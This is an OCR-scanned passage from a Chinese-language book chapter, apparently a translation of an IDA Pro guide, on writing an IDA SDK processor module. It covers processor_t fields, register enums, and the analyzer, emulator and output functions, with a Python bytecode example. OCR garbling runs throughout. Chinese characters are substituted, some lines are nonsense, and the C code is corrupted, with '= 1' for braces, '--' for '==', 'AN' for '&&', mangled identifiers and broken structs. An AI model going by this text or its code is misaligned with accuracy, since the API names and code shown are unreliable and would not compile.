这 里 选择 为 每 一 条 指令 显 式 赋值 ,这 既是 为 了 表述 清楚 ,也 因为 指令 序列 中 留 有 空白 ( 由 于 
使 用 了 真正 的 Python 操作 码 作为 指令 索引 )。 这 里 还 添加 了 另 一 个 常量 (PYTHON_LAST )， 以 便于 
你 找到 列表 的 结尾 。 了 解 指令 及 相关 整数 之 间 的 对 应 关系 后 ,我们 就 拥有 了 足够 的 信息 ， 可 以 初 
始 化 LPH (我 们 的 全 局 processor t) 的 3 个 字段 。 这 3 个 字段 为 : 














int instruc start;  // integer code of the first instruction 
int instruc end; // integer code of the last instruction + 1 
instruc t *instruc; // array of instructions 


我 们 必须 分 别 使 用 STOP CODE, PYTHON LAST 和 Instructions 初始 化 这 些 字段 。 这 些 字段 共 
同 使 处 理 需 模块 能 够 迅速 查询 反 汇 编 代 码 清单 中 任何 指令 的 助 记 符 。 

对 大 多 数 处 理 器 模块 而 言 ,我 们 还 需要 定义 一 组 寄存 器 名 称 以 及 一 组 枚 举 常 量 , 以 引用 它们 。 
如 果 要 编写 x86 处 理 絮 模块 ， 可 以 首先 编写 以 下 代码 。 在 这 里 ， 为 了 简化 ， 我 们 仅 限 于 基本 的 
x86 a Eds T: 








static char *RegNames[] = 1 
"eax", ebx "ecx", "edx", "edi", "esi", "ebp", "esp", 
"dX s X^. eX, "0X dis “sis DD s. sp 
"al", "ah", "bl", "bh", "cl", "ch", "dl", "dh", 
"es", "ds", "es", "fs", BS. 


)3 
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RegNames 数组 通常 在 文件 reg.cpp 中 声明 。 这 个 文件 也 是 样本 处 理 融 模 块 声 明 LPH 的 地 方 ， 
它 可 以 静态 声明 RegNames。 寄 存 需 枚 举 在 一 个 头 文件 中 声明 , 通 稼 这 个 文件 以 处 理 融 名 称 命名 ( 这 
里 可 能 为 x86.hpp )， 如 下 所 示 : 





enum x86 regs { 
r eax, r ebx, r ecx, r edx, r edi, r esi, r ebp, t esp, 
r ax, r bx, r cx, r dx, r di, r si, r bp, r sp, 
ral, rah, rbl, rbh, r cl, r ch, rdl, rdh, 
ry cs, rds, res, r fs, T gs 


éi 

一 定 要 维护 寄存 需 名 称 数组 与 相关 联 的 稼 量 集合 之 间 的 正确 对 应 关系 。 在 格式 化 指令 操作 数 
时 ， 和 寄存 需 名 称 数 组 与 枚 举 的 寄存 需 浓 量 共 同 作 用 ,使 处 理 需 模块 能 够 迅速 查询 寄存 希 名 称 。 这 
两 个 数据 声明 用 于 初始 化 LPH 中 的 其 他 字段 : 














int | regsNum; // total number of registers 
char **regNames; // array of register names 


通 稍 ， 这 两 个 字段 分 别 使 用 qnumber (RegNames ) 和 RegNames 进行 初始 化 ， 这 里 的 qnumber 
是 一 个 宏 ， 它 在 pro.h 中 定义 ， 用 于 计算 一 个 静态 分 配 的 数组 的 元 素数 量 。 

无 论 是 否 使 用 段 寄 存 带 ,IDA 人 处理 右 模块 总 是 需要 指定 与 段 寄存 占有 关 的 信息 。 由 于 x86 使 
用 了 段 寄 人 存 般 ， 前 面 的 例子 配置 起 来 相当 简单 。 段 寄存 天 使 用 processor 二 中 的 下 列 字段 配置 : 














@ // Segment register information (use virtual CS and DS registers if 
// your processor doesn't have segment registers): 


int —regFirstSreg; // number of first segment register 
int |reglastSreg; // number of last segment register 
int segreg size; // size of a segment register in bytes 


O // If your processor does not use segment registers, You should define 
// 2 virtual segment registers for CS and DS. 
// Let's call them rVcs and rVds. 
int | regCodeSreg; // number of CS register 
int | regDataSreg; // number of DS register 


要 初始 化 我 们 假定 的 x86 HEP oe Eh, OR BOY lou mn $ 个 字段 进行 初始 化 : 





I CS, Y gS, 2, Y CS, r ds 


THIEXSO MIO RECAP EARBUDETE. BEA AAMER ATA, IDA 总 是 需要 有 关 段 
ATARIA o EIS] Python 示例 ,在 设置 寄存 着 对 应 关系 时 ， 我 们 几乎 没有 什么 工作 要 做 ， 因 为 
Python 解释 各 采用 的 是 一 个 基于 栈 的 体系 结构 ， 它 并 不 使 用 寄存 融 ， 但 我 们 仍然 需要 人 处理 段 寄存 
Ti n], 典型 的 处 理 方法 是 虚构 最 小 的 一 组 段 寄 存 表 的 名 称 和 枚 举 篆 量 值 ( 代码 和 数据 ), 基本 上 ， 
我 们 虚构 段 寄存 种 ， 只 是 因为 IDA 需要 它们 。 但 是 ， 即 使 IDA 需要 它们 ,我 们 绝 没有 义务 使 用 它 
们 ， 因 此 ， 在 处 理 带 模块 中 ， 我 们 完全 忽略 它们 。 对 于 Python 处 理 带 ， 我 们 做 如 下 处 理 : 
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//in reg.cpp 
static char *RegNames = { "cs", "ds" }; 


//in python.hpp 
enum py registers ( rVcs, rVds j; 





声明 就 绪 后 ， 我 们 可 以 回 过 头 来 使 用 下 面 的 信 初 始 化 LPH 中 的 相应 字段 : 
rVcs, rVds, O, rVcs, rVds 


在 开始 执行 Python 处 理 器 的 任何 行为 之 前 ， 都 应 花 一 些 时 间 了 解 与 初始 化 LPH 结构 体 有 关 
的 一 些 简 单 知 识 。processor t 的 前 5 个 字段 如 下 所 示 : 





int version; // should be IDP INTERFACE VERSION 

int id; // IDP id, a PLFM xxx value or self assigned > 0x8000 
ulong flag; // Processor features, bitwise OR of PR xxx values 

int cnbits; // Number of bits in a byte for code segments (usually 8) 
int dnbits; // Number of bits in a byte for data segments (usually 8) 


这 里 的 version 字段 看 起 来 有 些 眼 熟 ， 因 为 插件 和 加 载 器 模块 也 使 用 了 这 个 字段 。 对 于 和 月 
定义 处 理 器 模块 来 说 ，id 字段 必须 是 一 个 大 于 0x8000 的 、 自 分 配 的 值 。flag 字段 以 在 idp.hpp 
中 定义 的 PR_xxx 标志 组 合 描 述 处 理 姻 模块 的 各 种 特点 。 对 于 Python AAS, RILIS E 
PR RNAMESOK 和 PRN_DEC， 前 者 允许 将 寄存 融 名 称 用 作 位 置 名 称 ( 因为 我 们 没有 寄存 絮 ， 这 不 会 
造成 问题 )， 后 者 将 默认 的 数字 显示 格式 设置 为 十 进 制 。 剩 下 的 两 个 字段 cnbits 和 dnbits 分 别 
设置 为 8。 








19.3.3 分 析 器 


ME, 我 们 已 经 在 LPH 结构 体 中 填 入 了 足够 的 信息 ,可 以 开始 考虑 处 理 从 模块 将 要 执行 的 第 
一 个 组 件 一 一 分 析 带 。 在 处 理 侣 模块 示例 中 ,分析 带 通 常 由 ana.cpp 文件 中 的 一 个 名 为 ana (R 
可 以 使 用 任何 你 喜欢 的 名 称 ) 的 函数 实现 。 这 个 函数 的 原型 非常 简单 ， 如 下 所 示 : 


int idaapi ana(void); //analyze one instruction and return the instruction length 





你 必须 用 一 个 指向 分 析 器 函数 的 指针 初始 化 LPH 对 象 的 u ana 成 员 。 分 析 器 的 工作 包括 分 析 
单条 指令 ， 用 与 指令 有 关 的 信息 填充 全 局 变量 cnd， 返 回 指令 的 长 度 。 分 析 器 不 得 对 数据 库 进 行 
任何 修改 。 

变量 cmd 是 insn t 对 象 的 一 个 全 局 实例 。 在 ua.hpp 中 定义 的 insn 鞋 类 用 于 描述 数据 库 中 的 
单条 指令 。 它 的 声明 如 下 所 示 : 





class insn t { 
public: 
ea t cs; // Current segment base paragraph. Set by kernel 
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ea t ip; // Virtual address of instruction (within segment). Set by kernel 
ea t ea; // Linear address of the instruction. Set by kernel 
O uint16 itype; // instruction enum value (not opcode!). Proc sets this in ana 
O  uint16 size; // Size of instruction in bytes. Proc sets this in ana 
union { // processor dependent field. Proc may set this 
uinti16 auxpref; 
struct ( 
uchar low; 
uchar high; 
} auxpref chars; 


3 


char segpref; // processor dependent field. Proc may set this 
char insnpref; // processor dependent field. Proc may set this 
© op t Operands[6]; // instruction operand info. Proc sets this in ana 
char flags; // instruction flags. Proc may set this 
n 


在 调用 分 析 器 函数 之 前 ，IDA 内 核 (IDA 的 核心 ) 会 使 用 指令 的 分 段 的 线性 地 址 填充 cmd 对 
象 的 前 3 个 字段 。 之 后 ， 再 由 分 析 需 填充 其 他 字段 。 需 要 分 析 需 填充 的 主要 字段 为 让 ype(〈@ )、 
size ( 6 ) 和 0perands (和 目 )。itype 字段 必须 设置 为 前 面 讨论 的 一 个 枚 举 指令 类 型 值 。size 字段 
必须 设置 为 指令 的 总 大 小 ， 并 且 应 用 作 指 令 的 返回 值 。 如 果 无 法 解析 指令 ， 分 析 需 应 返回 0。 最 
后 ， 一 条 指令 最 多 只 能 有 6 个 操作 数 ， 分 析 需 应 填充 与 指令 使 用 的 每 个 操作 数 有 关 的 信息 。 

分 析 顺 羡 数 通 滑 使 用 一 个 分 文 语句 来 实现 。 第 一 步 , 分 析 屁 通常 会 从 指令 流 中 请 求 一 个 或 几 
A OHBue T Abs) 字 节 ， 并 将 它们 作为 分 文 测 斌 变量。SDK 提供 特殊 的 郴 数 供 分 析 需 使 用 ， 
以 从 指令 流 中 获取 字 节 。 这 些 国 数 如 下 所 未 : 























//Tead one byte from current instruction location 
uchar ua next byte(void); 

//read two bytes from current instruction location 
ushort ua next word(void); 

//xead four bytes from current instruction location 
ulong ua next long(void); 

//read eight bytes from current instruction location 
ulonglong ua next qword(void); 





其 中 的 current instruction location (当前 指令 位 置 ) 是 cmd.ip 文件 中 的 初始 值 。 每 次 调 
用 一 个 ua. next. »ox 函数 ,都 会 产后 一 个 副作用 , 即 cmd.size 的 大 小 会 根据 被 调用 的 ua next. xxx 
国 数 所 请 求 的 字 节 数量 (1、2、4 或 8) 递增 。 获 取 的 字 节 必须 充分 解码 ， 以 在 itype 字段 中 分 
配 适 当 的 指令 类 型 枚 举 信 ， 决 定 指 令 所 需 的 任何 操作 数 的 数量 和 类 型 ， 然 后 决定 指令 的 总 长 度 。 
在 解码 的 过 程 中 ， 需要 用 到 其 他 指令 字 市 ， 直 到 从 指令 流 中 获取 整 条 指令 。 只 要 你 使 用 
ua next xxx PR, cmd.size 将 目 动 更 新 ， 因 而 你 不 必 跟 踩 你 已 经 从 给 定 指令 中 获取 了 多 少 个 字 
节 。 从 宏观 角度 看 ， 分 析 器 有 点 类 似 于 现 有 CPU 所 使 用 的 指令 提取 和 指令 解码 阶段 。 在 现实 后 
活 中 ， 对 使 用 固定 长 度 的 指令 的 处 理 器 进行 指令 解码 会 更 加 容易 ，RISC 体系 结构 即 是 如 此 。 而 
对 使 用 可 变 长 度 的 指令 的 处 理 需 进行 指令 解码 则 会 更 加 困难 ， 如 x86 Ah Pigs o 
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使 用 获取 到 的 字 市 ， 分析 带 必须 为 指令 使 用 的 每 一 个 操作 数 初 娘 化 cmd.0perands 数组 中 的 
一 个 元 系 。 指 令 操 作 数 使 用 在 ua.hpp 中 定义 的 op. t 类 的 实例 表示 ， 如 下 所 示 : 


class op t 1 

public: 
char n; // number of operand (0,1,2). Kernel sets this do not change! 
optype t type; // type of operand. Set in ana, See ua.hpp for values 


// offset of operand relative to instruction start 

char offb; //Proc sets this in ana, set to O if unknown 

// offset to second part of operand (if present) relative to instruction 
start 


char offo; //Proc sets this in ana, set to O if unknown 
uchar flags; //Proc sets this in ana. See ua.hpp for possible values 


char dtyp; // Specifies operand datatype. Set in ana. See ua.hpp for values 


// The following unions keep other information about the operand 


union ( 
uinti6 reg; // number of register for type o reg 
uint16 phrase; // number of register phrase for types o phrase and o displ Cu 
// define numbers of phrases as you like 
n 
union 1 // value of operand for type o imm or 
uval t value; // outer displacement (o displ«OF OUTER DISP) 
struct ( // Convenience access to halves of value 


uinti16 low; 
uinti16 high; 
} value shorts; 


n 


union (  // virtual address pointed or used by the operand 
ea t addr; // for types (o mem,o displ,o far,o near) 
struct ( // Convenience access to halves of addr 
uinti16 low; 
uinti16 high; 
} addr shorts; 
}; 


//Processor dependent fields, use them as you like. Set in ana 
union { 
ea t specval; 
struct { 
uint16 low; 
uint16 high; 
} specval shorts; 


char specflagi, specflag2, specflag3, specflag4; 
H 
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要 配置 一 个 操作 数 ， 前 先 需 要 将 操作 数 的 type 字段 设置 为 在 ua.hpp 中 定义 的 一 个 枚 举 
optype 芋 常量。 操作 数 的 type 摘 述 了 操作 数 数 据 的 来 源 和 目标 。 换 句 话 说 ，type 字段 大 致 描述 
操作 数 所 采用 的 寻 址 模式 。 操 作 数 类 型 包括 o reg. o men bo imm， 它 们 分 别 表示 操作 数 是 一 个 
寄存 器 的 内 容 、 一 个 在 编译 时 获知 的 内 存 地 址 和 指令 中 的 即时 数据 。 

dtype 字段 指定 操作 数 数据 的 大 小 。 这 个 字段 应 设置 为 ua.hpp 文件 指定 的 一 个 dt. xxx 值 。 示 
例 值 包括 用 于 8 位 数据 的 ot type、 用 于 16 位 数据 的 上 word 和 用 于 32 位 数据 的 dt. dword。 

下 面 的 x86 指令 说明 了 一 些 主要 的 操作 数 数 据 类 型 与 常用 的 操作 数 之 间 的 对 应 关系 : 











mov eax, 0x31337 ; o reg(dt dword), o imm(dt dword) 
push word ptr [ebp - 12]  ; o displ(dt word) 

mov [0x08049130], bl ; o mem(dt byte), o reg(dt byte) 
mOVZX eax, ax ; o reg(dt dword), o reg(dt word) 
ret ; o void(dt void) 


op_t 中 各 种 联合 的 使 用 方式 由 type 字段 的 值 确定 。 例 如 ， 如 果 一 个 操作 数 的 类 型 为 "mm, 
则 即时 数据 值 应 存储 在 value 字段 中 ; 如 果 操 作 数 的 类 型 为 0_reg， 则 寄存 角 纺 号 〈 根 据 一 组 枚 
举 的 寄存 带 第 量 ) 应 存储 在 reg 字段 中 。 有 关 指 令 的 每 一 条 信息 的 详细 存储 位 置 ， 请 参阅 ua.hpp 
Xi 

请 注意 , op t 中 没有 字段 摘 述 操作 数 是 否 被 用 作 数 据 来 源 或 目标 。 实 际 上 , 这 不 是 分 析 融 的 
任务 。 指 令 名 称 数组 中 指定 的 典型 标志 将 在 后 阶段 用 于 决定 具体 如 何 使 用 操作 数 。 

insn 七 类 和 op t 类 中 有 几 个 字段 被 描述 为 “是 取决 于 处 理 带 的 "， 这 表示 你 可 以 将 这 些 字 
段 用 于 任何 目的 。 通 第 ， 这些 字段 用 于 存储 这 些 类 中 的 其 他 字段 不 适 于 存储 的 信息 。“ 取 决 于 处 
理 融 ”的 字段 也 是 一 种 癌 处 理 人 的 后 阶段 传递 信息 的 便捷 机 制 ， 使 这 些 阶段 不 需要 重复 分 析 些 
的 工作 。 

讨论 完 与 分 析 带 有 关 的 所 有 基本 规则 后 ， 我 们 可 以 开始 着 手 为 Python 字 节 码 创建 一 个 最 小 
MINTA o Python 字 广 人 码 非常 位 单 。Python SIE MIT. AT 90 的 操作 人 码 没 有 操作 数 ， 
而 大 于 或 等 于 90 的 操作 码 拥有 一 个 2 字 广 的 操作 数 。 我 们 创建 的 基本 分 析 带 如 下 所 示 : 


#define HAVE ARGUMENT 90 
int idaapi py ana(void) { 
cmd.itype = ua next byte(); //opcodes ARE itypes for us (updates cmd.size) 
if (cmd.itype >= PYTHON LAST) return 0; //invalid instruction 
if (Instructions[cmd.itype].name -- NULL) return o: //invalid instruction 
if (cmd.itype < HAVE ARGUMENT) { //no operands 
cmd.Opi.type - o void; //Op1 is a macro for Operand[O0] (see ua.hpp) 
cmd.Opi.dtyp - dt void; 























else { //instruction must have two bytes worth of operand data 
if (flags[cmd.itype] & (HAS JREL | HAS JABS)) { 
cmd.Opi.type = o near; //operand refers to a code location 


else { 
cmd.Opi1.type = o mem;  //operand refers to memory (sort of) 
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} 
cmd.Op1.offb 
cmd .Op1.dtyp 


zd //operand offset is 1 byte into instruction 

= dt dword;  //No sizes in python so we just pick something 
cmd.Op1.value = ua next word(); //fetch the operand word (updates cmd.size) 
cmd.auxpref - flags[cmd.itype]; //save flags for later stages 


if (flags[cmd.itype] & HAS JREL) 1 
//compute relative jump target 
cmd.Opi.addr = cmd.ea + cmd.size + cmd.Op1.value; 


i 
else if (flags[cmd.itype] & HAS JABS) { 
cmd.Opi.addr = cmd.Opi.value; //save absolute address 


j 

else if (flags[cmd.itype] & HAS CALL) 1 
//target of call is on the stack in Python, the operand indicates 
//how many arguments are on the stack, save these for later stages 


cmd.Opi.specflagi = cmd.Opi.value & OxFF; //positional parms 
cmd.Opi.specflag2 = (cmd.Opi.value >> 8) & OxFF; //keyword parms 
J 
j 
return cmd.size; 


j 


对 Python 处 理 器 模块 来 说 ， 我 们 为 每 条 指令 创建 了 另外 一 个 标志 数组 ， 用 于 补充 (有 时 候 
是 复制 ) 每 条 指令 的 “典型 特征 ”。 我 们 定义 了 HAS JREL HAS JABS 和 HAS CALL 标志 ， 供 flags 
数组 使 用 ,我 们 使 用 这 些 标志 指出 一 个 指令 操作 数 表示 一 个 相对 跳 转 偏 移 量 还 是 一 个 绝对 跳 转 目 
标 ， 或 者 是 函数 调用 栈 说 明 。 如 果 不 深入 分 析 Python 解释 右 的 操作 ， 我 们 很 难 解释 分 析 阶 段 的 
每 一 个 细 闻 ， 因 此 ， 利 用 前 面 代 码 中 的 注释 ， 基 于 分 析 器 的 工作 是 解析 单条 指令 ,我 们 将 分 析 器 
的 功能 总 结 为 如 下 内 容 。 

(1) 分 析 融 从 指令 流 中 获得 下 一 个 指令 字 ,并 决定 该 字 节 是 否 是 一 个 有 效 的 Python 操作 码 。 

(2) 如 果 该 指令 没有 操作 数 ， 则 将 cmd.0perand[0] ( cmd.Opl ) 初始 化 为 o void。 

(3) 如 果 该 指令 有 一 个 操作 数 ， 则 初始 化 cmd.0perand[0] 以 反映 该 操作 数 的 类 型 。 几 个 特定 
于 处 理 硕 的 字段 用 于 将 信息 转发 到 处 理 融 模 块 的 后 续 阶 段 。 

(4) 回调 用 方 返回 指令 的 长 度 。 

可 以 肯定 ,指令 集 越 复 杂 , 分 析 带 阶段 就 越 复 杂 。 但是， 总 体 而 言 ,任何 分 析 带 的 行为 通常 
都 会 包括 以 下 内 容 。 

(1) 从 指令 流 中 读 取 足够 的 字 市 ， 以 确定 指令 是 否 有 效 ， 并 将 指令 与 一 个 指令 类 型 枚 举 常 量 
对 应 起 来 ， 然 后 将 这 个 常量 保存 在 cmd. itype 中 。 这 项 操作 通常 由 一 个 大 的 分 支 语句 执行 ， 以 对 
指令 操作 码 进 行 分 类 。 

Q) 读 取 所 需 的 其 他 字 节 ， 以 正确 确定 指令 所 需 的 操作 数 的 数量 、 这 些 操 作 数 使 用 的 寻 址 模 
式 以 及 构成 每 个 操作 数 ( 寄存 右 和 即时 数据 ) 的 组 件 。 这 些 数据 用 于 填充 cmd.0perands 数组 的 
元 素 。 这 项 操作 由 一 个 单独 的 操作 数 解 码 函 数 执行 。 
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G) 返回 指令 及 其 操作 数 的 总 长 度 。 

严格 来 讲 ,解析 一 条 指令 后 ,IDA 将 拥有 足够 的 信息 ， 能 够 生成 该 指令 的 汇编 语言 代码 。 为 
了 生成 交叉 引用 ,促进 递归 下 降 过 程 ， 并 监控 程序 栈 指针 的 行为 ，IDA 必须 获得 关于 每 条 指令 的 
其 他 信息 。 这 是 IDA 处 理 器 模块 模拟 器 阶段 的 任务 。 








19.3.4 ”模拟 器 


分 析 需 阶段 分 析 单 条 指令 的 结构 ， 而 模拟 硕 阶 段 则 分 析 单 条 指令 的 行为 。 在 IDA 处 理 带 模 
块 中 ， 模 拟 右 通常 由 emu.cpp 文件 中 的 emu. (你 可 以 使 用 任何 你 喜欢 的 名 称 ) 函数 实现 。 和 ana 
足 数 一 样 ， 这 个 函数 的 原型 非常 人 简单， 如 下 所 示 : 


int idaapi emu(void); //emulate one instruction 


根据 idp.hpp 文件 ，emu 函数 应 返回 被 模拟 的 指令 的 长 度 , 但 是 , 绝 大 多 数 的 样本 模拟 需 似 乎 
返回 的 都 是 1。 

你 必须 使 用 一 个 括 回 你 的 模拟 硕果 数 的 指针 初始 化 LPH 对 和 象 的 u_emu 成 员 。 到 调用 emu 时 ， 
cmd 已 经 被 分 析 需 初始 化 。 模 拟 需 的 主要 作用 是 基于 cmd 描述 的 指令 的 行为 创建 代码 和 数据 交叉 
引用 。 模拟 器 还 用 于 跟踪 栈 指针 的 变化 ， 并 根据 观察 到 的 对 函数 栈 帧 的 访问 创建 局 部 变量 ,。 与 分 
Mrs], Sia n] LA SB pico s Pg o 

通常 ， 确 定 一 条 指令 是 否 会 创建 交 义 引用 ,需要 检查 该 指令 的 “典型 特征 ”， 以 及 指令 操作 
数 的 type 字段 。 下 面 是 一 个 每 条 指令 最 多 包含 两 个 操作 数 的 指令 集 的 基本 模拟 需 果 数 〈 典 型 的 
SDK 示例 ): 


























void TouchArg(op t &op, int isRead); //Processor author writes this 


int idaapi emu() { 
ulong feature - cmd.get canon feature(); //get the instruction's CF xxx flags 


if (feature & CF USE1) TouchArg(cmd.Opi, 1); 
if (feature & CF USE2) TouchArg(cmd.0Op2, 1); 


if (feature & CF CHG1) TouchArg(cmd.Opi, O); 
if (feature & CF CHG2) TouchArg(cmd.Op2, 0); 


if ((feature & CF STOP) -- 0) ( //instruction doesn't stop 
//add code cross ref to next sequential instruction 
ua add cref(0, cmd.ea + cmd.size, fl F); 


j 


return 1; 


} 


对 于 每 个 指令 操作 数 ， 前 面 的 函数 检查 指令 的 “上 典型 特征 ”"， 以 确定 是 否 应 生成 任何 交叉 引 
用 。 在 这 个 例子 中 ， 一 个 名 为 TouchArg 的 函数 检查 每 一 个 操作 数 ， 以 确定 应 生成 什么 类 型 的 区 
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叉 引 用 ,并 处 理 正确 生成 交叉 引用 的 细节 。 由 模拟 磊 生 成 交叉 引用 时 ， 你 应 使 用 在 ua.hpp( 而 不 
是 在 xref.hpp ) 中 声明 的 交叉 引用 创建 函数 。 下 面 的 简单 指南 用 于 确定 生成 什么 类 型 的 交叉 引用 。 
O 如 果 操 作 数 类 型 为 oimm， 则 操作 为 读 取 CisRead 为 真 )， 且 操作 数 的 数值 为 一 个 指针 ， 
并 创建 一 个 偏 移 量 引 用 。 确 定 一 个 操作 数 是 否 为 指针 ， 和 需要 调用 is0ff PROMO, A 
is0ff(uFlag，op.n)。 使 用 ua add off drefs 添加 一 个 偏 移 量 交 又 引用， 如 ua add off 
drefs(op, dr 0):;o 
口 如 果 操 作 数 类 型 为 o displ 且 操 作 数 的 数值 是 一 个 指针 , 则 根据 需要 创建 一 个 读 取 或 写 信 
类 型 的 偏 移 量 交叉 引用 ， 如 ua add off drefs(op. isRead ? dr R : dr W);o 
口 如 果 操 作 数 类 型 为 o mem， 则 根据 需要 使 用 ua add dref 添加 一 个 谈 取 或 写 人 类 型 的 数据 
交叉 引用 ， 如 ua add dref(op.offb, op.addr, isRead ? dr R : dr W):。 
口 如 有 果 操 作 数 类 型 为 o near， 则 根据 需要 使 用 ua add cref 添加 一 个 跳 转 或 调用 交叉 引用 ， 
20 ua add cref(op.offb, op.addr. feature & CF CALL ? f1 CN : fl JN):。 
模拟 需 还 负责 报告 栈 指针 寄存 需 的 行为 。 模 拟 需 应 通过 add auto stkpnt2 KAYF IDA: 一 
条 指令 更 改 了 栈 指针 的 值 。add auto stkpnt2 函数 的 原型 如 下 所 示 : 

















bool add auto stkpnt2(func t *pfn, ea t ea, sval t delta); 


pfn 指针 应 指向 包含 被 模拟 地 址 的 函数 。 如 末 pfn 7j NULL, CHA IDA Dag, ea 2 
数 应 指定 更 改 栈 指针 的 指令 的 结束 地 址 ( 通常 为 and_eatcmd size ), delta 参数 应 用 于 指定 栈 指 
针 变 大 或 缩小 的 字 节 数 。 如 果 栈 变 大 ( 如 执行 push 指令 后 )， 则 使 用 负 增 量 ， 如 果 栈 缩小 ( 如 
执行 pop 指令 后 )， 就 使 用 正 增 量 。 使 用 push 操作 对 栈 指针 进行 简单 的 4 字 节 调整 ， 其 模拟 代 
但 如 下 : 

if (cmd.itype -- X86 push) { 


add auto stkpnt2(NULL, cmd.ea + cmd.size, -4); 
j 


为 了 准确 记录 栈 指针 的 行为 , 模拟 融 应 能 够 识别 和 模拟 更 改 栈 指针 的 所 有 指令 ， 而 不 仅仅 是 
简单 的 push 和 pop 指令 。 如 末 一 个 水 数 通 过 从 栈 指针 中 减 去 一 个 生 量 值 来 分 配 它 的 局 部 变量 ， 
这 时 跟 踊 栈 指针 可 能 会 更 加 复杂 ， 如 下 所 示 : 

//handle cases such as: sub esp, 48h 

if (cmd.itype == X86 sub AN cmd.Opi.type == o reg 

88 cmd.Opi.reg == r esp AN cmd.Op2.type == o imm) { 
add auto stkpnt2(NULL, cmd.ea + cmd.size, -cmd.Op2.value); 


j 


因为 各 CPU 体系 结构 之 间 存 在 巨大 的 差异 ，IDA (或 任何 其 他 类 似 的 程序 ) 不 可 能 考虑 到 
操作 数 的 每 一 种 构成 ， 以 及 指令 引用 其 他 指令 或 数据 的 每 一 种 方式 。 因 此 ,关于 如 何 构建 模拟 天 
模块 ， 并 没有 精确 的 指南 。 要 想 构建 满足 你 需求 的 模拟 硕 ,， 你 需要 仔细 阅读 现 有 的 处 理 天 模块 源 
代码 ， 并 进行 大 量 的 试验 。 
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示例 Python 处 理 带 的 模拟 硕 如 下 所 示 : 


int idaapi py emu(void) { 
//We can only resolve target addresses for relative jumps 
if (cmd.auxpref & HAS JREL) ( //test the flags set by the analyzer 
ua add cref(cmd.Op1.offb, cmd.Opi.addr, fl JN); 


//Add the sequential flow as long as CF STOP is not set 
if((cmd.get canon feature() & CF STOP) == 0) { 
//cmd.ea + cmd.size computes the address of the next instruction 
ua add cref(0, cmd.ea + cmd.size, fl F); 


j 


return 1; 


j 


由 于 Python DPE Ze rf D) ok 2 Zén. defi 8699 TIAS HAAK SIRO RS B ril o 
在 Python 字 节 码 中 ， 并 没有 数据 项 内 存 地 址 的 概念 ， 每 条 指令 的 绝对 地 址 只 能 通过 解析 编译 后 
的 Python〈.pyc ) 文件 所 包含 的 元 信息 才能 确定 。 数 据 项 要 么 存储 在 表 中 ， 并 通过 索引 信 引 用 ， 
要 么 存储 在 程序 栈 上 , 不 能 直接 引用 。 同 样 , 虽然 我 们 能 够 直接 从 指令 操作 数 中 读 取 数据 项 索引 
值 , 但 是 , 除非 我 们 解析 .pyc 文件 中 包含 的 其 他 元 信息 , 否则 无 法 获知 保存 这 些 数据 的 表 的 结构 。 
在 我 们 的 处 理 器 中 ， 只 能 计算 出 相对 跳 转 指令 的 目标 , 以 及 下 一 条 指令 的 地 址 ， 是 因为 它们 的 位 
置 与 当前 指令 的 地 址 有 关 。 实 际 上 , 我 们 的 处 理 器 只 有 更 详细 地 了 解 文件 结构 ， 才 能 提供 更 加 完 
善 的 反 汇 编 代 码 清单 。 我 们 将 在 19.6 市 中 讨论 这 个 限制 。 

因为 相同 的 原因 ， 我 们 选择 在 Python 处 理 器 中 不 跟踪 栈 指针 的 行为 。 这 主要 是 因为 IDA 
只 处 理 在 函数 范围 内 发 生 的 栈 指 针 变 化 ， 而 目前 我 们 并 没有 办 法 识别 Python 代码 中 的 函数 边 
界 。 如 果 我 们 想 进行 栈 指针 跟踪 ， 应 该 记 住 的 是 ， 作 为 一 种 基于 栈 的 体系 结构 ， 几 乎 每 一 条 
Python 指令 都 会 以 某 种 方式 修改 栈 。 在 这 种 情况 下 ， 为 了 简单 确定 每 条 指令 更 改 了 多 少 个 栈 
和 针 ， 一 个 较为 容易 的 方法 是 为 每 条 Python 指令 定义 一 个 数值 数组 ， 并 在 这 些 数值 中 包含 
条 指令 修改 栈 的 总 次 数 。 然 后, 在 每 次 模拟 指令 时 , 将 这 些 总 次 数 用 于 调用 add auto stkpnt2 
EEN. 

只 要 模拟 硕 已 经 添加 了 它 能 生成 的 所 有 交叉 引用 , 并 且 对 数据 库 进 行 了 它 认 为 必要 的 其 他 修 
改 后 ， 你 就 可 以 开始 生成 输出 了 。 在 下 一 方 中 ， 我们 将 讨论 如 何 使 用 输出 带 生 成 IDA. 的 反 汇 编 
代码 清单 。 


19.3.5 ”输出 器 


输出 需 的 作用 是 根据 cmd 全 局 变量 的 指示 , 将 一 条 经 过 反 汇 编 的 指令 输出 到 IDA 窗口 中 。 在 
IDA 处 理 带 模块 中 , 输出 絮 通 常 由 out.cpp 文件 中 的 out. (你 可 以 使 用 任何 你 喜欢 的 名 称 ) PRICE 
DU. Dana 和 emu 函数 一 样 ， 这 个 国 数 的 原型 非常 简单 ， 如 下 所 示 : 
































void idaapi out(void); //output a single disassembled instruction 


19.3 使 用 SDK 编写 处 理 器 模块 311 


你 必须 使 用 一 个 指向 输出 函数 的 指针 初始 化 LPH 对 象 的 u_out 成 员 。 到 调用 out 时 ，cmd 已 
经 被 分 析 器 初始 化 。 输 出 函数 不 得 以 任何 形式 修改 数据 库 。 你 还 需要 创建 一 个 帮助 函数 ,专门 用 
于 格式 化 和 输出 一 个 指令 操作 数 。 通 党 ,这 个 函数 名 为 outop, LPH 的 u outop 成 员 即 指向 这 个 郴 
数 。out 函数 不 能 直接 调用 outop 函数 。 每 次 需要 打印 反 汇 编 行 的 操作 数 部 分 时 ， 你 应 当 调 用 
out one operand 函数 。 数 据 输出 操作 通常 由 cpu data 函数 处 理 ， 并 由 LPH 对 象 的 d out 成 员 指 
定 。 在 Python 处 理 器 中 ， 这 个 函数 叫做 python data; 

有 反 汇 编 代码 清单 中 的 输出 行 由 几 个 组 件 构 成 ， 如 前 级 、 名 称 标签 、 助 记 符 、 操 作 数 ， 可 能 还 
包括 注释 。IDA 内 核 负责 显示 其 中 一 些 组 件 ( 如 前 级 、 注 释 和 交叉 引用 )， 而 其 他 组 件 则 由 处 理 
器 的 输出 器 负责 显示 。 一 些 用 于 生成 输出 行 组 件 的 函数 在 ua.hpp 文件 的 以 下 标题 下 声明 : 

















// IDP HELPER FUNCTIONS - OUTPUT 





fi FE hR HP fL ACREPRPREVERAE BJ PRAG, nl UL ët i HET HT ën US HER £5 o 
其 他 用 于 生成 输出 行 的 函数 在 lines.hpp 文件 中 声明 。 
IDA 并 未 使 用 可 以 直接 在 其 中 写 和 内容 的 基于 控制 台 的 输出 模型 , 而 是 采用 一 种 基于 缓冲 区 
